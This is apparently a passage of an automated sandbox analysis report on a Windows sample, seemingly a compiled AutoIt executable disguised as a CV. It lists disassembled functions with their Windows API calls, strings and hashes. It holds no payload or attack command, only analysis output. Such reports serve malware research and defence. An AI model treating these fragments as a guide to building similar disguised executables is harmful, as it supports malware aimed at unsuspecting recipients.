                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 8fec33f372702eaa7a69c64aa77ead3040d08f0d104eccc32985462ea4edd9b6
                                                                                        • Instruction ID: 1cc1654c7fbe7efc2a11ab29ced6f1c9d927efde71b499045e1d7c03057b97a6
                                                                                        • Opcode Fuzzy Hash: 8fec33f372702eaa7a69c64aa77ead3040d08f0d104eccc32985462ea4edd9b6
                                                                                        • Instruction Fuzzy Hash: 1D81C4310083059BDB06DF50C985FEA7BE8FF84718F05446AFE8A9A496EB34DD45CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: 8f8554615ad0937117da267620b65c5b442d3c7c18ab509f5b4561bec41ff2dc
                                                                                        • Instruction ID: 1c7c16292abf650c6c63a614355080913fd702d12a195b76de41c29f6c9684b0
                                                                                        • Opcode Fuzzy Hash: 8f8554615ad0937117da267620b65c5b442d3c7c18ab509f5b4561bec41ff2dc
                                                                                        • Instruction Fuzzy Hash: 1C31CF31644305AADB17FE20EE43FEDB3A89F24718F30106AF541B94D5FFA5AA04C615
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 003BEAB0
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003BEAC2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 003BEAD9
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 003BEAEE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 003BEAF4
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEB04
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 003BEB0A
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003BEB2B
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003BEB45
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BEB4E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 003BEBB9
                                                                                        • GetDesktopWindow.USER32 ref: 003BEBBF
                                                                                        • GetWindowRect.USER32(00000000), ref: 003BEBC6
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003BEC12
                                                                                        • GetClientRect.USER32(?,?), ref: 003BEC1F
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003BEC44
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003BEC6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: bc0c2b691a9ab521a51497dbde944e710ed65413b4b64a18e920b59c905e53b6
                                                                                        • Instruction ID: 70fec8ba0b9004a34a438faf7a53ffd11a31c29266d4e34cc0e8c1bf2bbbaab6
                                                                                        • Opcode Fuzzy Hash: bc0c2b691a9ab521a51497dbde944e710ed65413b4b64a18e920b59c905e53b6
                                                                                        • Instruction Fuzzy Hash: 51515171900709EFDB21DFA8CE85FAEBBF5FF04708F014928E646A29A0C775A944CB14
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 003D79C6
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 003D79D1
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 003D79DC
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 003D79E7
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 003D79F2
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 003D79FD
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 003D7A08
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 003D7A13
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 003D7A1E
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 003D7A29
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 003D7A34
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 003D7A3F
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 003D7A4A
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 003D7A55
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 003D7A60
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 003D7A6B
                                                                                        • GetCursorInfo.USER32(?), ref: 003D7A7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: a51f28d937534fccafb9c47ab05a12d324e1b94382d2b9ec57a96d430ada8390
                                                                                        • Instruction ID: d486833e5745f0778f9381cb3f350b9194bc311000595d40f8d90f0e8cca9d4e
                                                                                        • Opcode Fuzzy Hash: a51f28d937534fccafb9c47ab05a12d324e1b94382d2b9ec57a96d430ada8390
                                                                                        • Instruction Fuzzy Hash: DF3103B1D4831A6ADB119FB69C8995FBFE8FF04750F50452BA50DE7280EA78A5008FA1
                                                                                        APIs
                                                                                          • Part of subcall function 0039E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0038C8B7,?,00002000,?,?,00000000,?,0038419E,?,?,?,0041DC00), ref: 0039E984
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                        • __wsplitpath.LIBCMT ref: 0038C93E
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscpy.LIBCMT ref: 0038C953
                                                                                        • _wcscat.LIBCMT ref: 0038C968
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0038C978
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0038CABE
                                                                                          • Part of subcall function 0038B337: _wcscpy.LIBCMT ref: 0038B36F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 2258743419-1018226102
                                                                                        • Opcode ID: 9c427cc4bdd927f46a1ab57a7ecc601d767b0d170e725b21f019f25b9a721b5a
                                                                                        • Instruction ID: bc4ba1cfc8aec815e8a91300927d6e4e866daf576a72c94acdd4fc2d3f1f3aba
                                                                                        • Opcode Fuzzy Hash: 9c427cc4bdd927f46a1ab57a7ecc601d767b0d170e725b21f019f25b9a721b5a
                                                                                        • Instruction Fuzzy Hash: 4612B1715083459FC726EF24C881AAFBBE4FF99314F00495EF5899B261DB30DA49CB62
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003ECEFB
                                                                                        • DestroyWindow.USER32(?,?), ref: 003ECF73
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ECFF4
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003ED016
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003ED025
                                                                                        • DestroyWindow.USER32(?), ref: 003ED042
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00380000,00000000), ref: 003ED075
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003ED094
                                                                                        • GetDesktopWindow.USER32 ref: 003ED0A9
                                                                                        • GetWindowRect.USER32(00000000), ref: 003ED0B0
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003ED0C2
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003ED0DA
                                                                                          • Part of subcall function 0039B526: GetWindowLongW.USER32(?,000000EB), ref: 0039B537
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 3877571568-3619404913
                                                                                        • Opcode ID: 20b3bcd0144c46641eab62a2e51422f015ea6baeba67fdba7e7cfa7a35ce8800
                                                                                        • Instruction ID: 2668fddf21cd2e5a667a963aa68a9c0d9fd0d6966e50f90031511544a0843520
                                                                                        • Opcode Fuzzy Hash: 20b3bcd0144c46641eab62a2e51422f015ea6baeba67fdba7e7cfa7a35ce8800
                                                                                        • Instruction Fuzzy Hash: F671DCB4140344AFDB22CF68CC85F6677E5EB89304F094629F985972E0C734EC46CB16
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 003EF37A
                                                                                          • Part of subcall function 003ED7DE: ClientToScreen.USER32(?,?), ref: 003ED807
                                                                                          • Part of subcall function 003ED7DE: GetWindowRect.USER32(?,?), ref: 003ED87D
                                                                                          • Part of subcall function 003ED7DE: PtInRect.USER32(?,?,003EED5A), ref: 003ED88D
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003EF3E3
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EF3EE
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EF411
                                                                                        • _wcscat.LIBCMT ref: 003EF441
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EF458
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003EF471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003EF488
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003EF4AA
                                                                                        • DragFinish.SHELL32(?), ref: 003EF4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EF59C
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: ef8dd696fa6dc1f920e29cb62e40fd364c10d7ae4c7d485419f74c6af35949b5
                                                                                        • Instruction ID: da4a213885e33bf5a033e5bd6d0702d34f62779581255f74e807cf9c9cefc470
                                                                                        • Opcode Fuzzy Hash: ef8dd696fa6dc1f920e29cb62e40fd364c10d7ae4c7d485419f74c6af35949b5
                                                                                        • Instruction Fuzzy Hash: 32614B71508340AFC702EF65CC85E9FBBE8EF89710F104A2EF595A61A1DB70DA09CB56
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003CAB3D
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003CAB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003CAC40
                                                                                        • __swprintf.LIBCMT ref: 003CAC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 003CAC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 003CAD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 003CADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 003CAE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003CAE80
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: 233bbf7e72d7485e3631ca90c9e9311235b84edb3fc53fb69226b2f988e963d8
                                                                                        • Instruction ID: 07e67e41a652bc7f4443b8a5fe2c241e22efd82c8da8c6c311ae18639cc2243e
                                                                                        • Opcode Fuzzy Hash: 233bbf7e72d7485e3631ca90c9e9311235b84edb3fc53fb69226b2f988e963d8
                                                                                        • Instruction Fuzzy Hash: CAD1FF71A00A19DBCF16AF65C884F6AB7B9BF04704F15806DE405EB580DB34EC40DBA2
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003E71FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7247
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 6e8a961eac16ad285aed6794591b87bbcda57fb1b5f99705e4ef8a73e0eb79ef
                                                                                        • Instruction ID: 121705043d7b3711268a165047d1b58a46d05551fb29c88ccb5a2c6ec14a38d6
                                                                                        • Opcode Fuzzy Hash: 6e8a961eac16ad285aed6794591b87bbcda57fb1b5f99705e4ef8a73e0eb79ef
                                                                                        • Instruction Fuzzy Hash: FC919F342047519BCB16FF21C851AAEB7A5BF84304F044999F9966B7E2DB30ED0ADB81
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,003BCF50), ref: 003BCE90
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: 4+C$CLASS$CLASSNN$H+C$INSTANCE$L+C$NAME$P+C$REGEXPCLASS$T+C$TEXT
                                                                                        • API String ID: 3555792229-4208749292
                                                                                        • Opcode ID: a27f601f53935fc7551014b3a4f51040a70fad76b847a8bd89557f077e40e722
                                                                                        • Instruction ID: 19031b7551f364f7cab0b04da9044d82b1720450003ae603f6450da3adc9bcef
                                                                                        • Opcode Fuzzy Hash: a27f601f53935fc7551014b3a4f51040a70fad76b847a8bd89557f077e40e722
                                                                                        • Instruction Fuzzy Hash: D4919530A10606DBCB2AEF60C482BEAFB75FF04304F509559DA59AB651DF30B959CBD0
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EE5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,003E9808,?), ref: 003EE607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EE6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,003E9808,?), ref: 003EE6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EE6DF
                                                                                        • DestroyIcon.USER32(?), ref: 003EE6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EE70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EE717
                                                                                          • Part of subcall function 003A0FA7: __wcsicmp_l.LIBCMT ref: 003A1030
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 92377dcedf7cb9136f9d99e674457ff8ed2e04d8bb4d0400780f4d567a592f53
                                                                                        • Instruction ID: f41993837c03f3a9bcfa994eaa3e1418fa8949d2ab9a0a1c0e3fc713c9042315
                                                                                        • Opcode Fuzzy Hash: 92377dcedf7cb9136f9d99e674457ff8ed2e04d8bb4d0400780f4d567a592f53
                                                                                        • Instruction Fuzzy Hash: 8561E171900265FAEB26DF65CC46FBE77A8BB08724F104215F911EA1D1EB74E980CB64
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 003CD292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 003CD2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CD38C
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: 0f144b4440fec817045cfbddefedfda35b5f665a76d1161b0ab929cdd57e2862
                                                                                        • Instruction ID: 157e8f063978cf5826511136f2eb958092bd06f86b939a177d4129abfb4effb5
                                                                                        • Opcode Fuzzy Hash: 0f144b4440fec817045cfbddefedfda35b5f665a76d1161b0ab929cdd57e2862
                                                                                        • Instruction Fuzzy Hash: 3A513B75504705AFC702FF20C98196AB7E4FF98718F10886DF885AB261DB35EE09CB52
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003F3973,00000016,0000138C,00000016,?,00000016,0041DDB4,00000000,?), ref: 003C26F1
                                                                                        • LoadStringW.USER32(00000000,?,003F3973,00000016), ref: 003C26FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003F3973,00000016,0000138C,00000016,?,00000016,0041DDB4,00000000,?,00000016), ref: 003C271C
                                                                                        • LoadStringW.USER32(00000000,?,003F3973,00000016), ref: 003C271F
                                                                                        • __swprintf.LIBCMT ref: 003C276F
                                                                                        • __swprintf.LIBCMT ref: 003C2780
                                                                                        • _wprintf.LIBCMT ref: 003C2829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C2840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CD0D8
                                                                                        • __swprintf.LIBCMT ref: 003CD0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 003CD137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CD15C
                                                                                        • _memset.LIBCMT ref: 003CD17B
                                                                                        • _wcsncpy.LIBCMT ref: 003CD1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CD1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003CD1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 003CD200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003CD20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 003EE754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 003EE76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003EE776
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003EE783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003EE78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003EE79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003EE7A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003EE7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003EE7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0040D9BC,?), ref: 003EE7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003EE7E5
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 003EE809
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 003EE834
                                                                                        • DeleteObject.GDI32(00000000), ref: 003EE85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EE872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 003D076F
                                                                                        • _wcscat.LIBCMT ref: 003D0787
                                                                                        • _wcscat.LIBCMT ref: 003D0799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003D07AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D07C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003D07DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 003D07F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
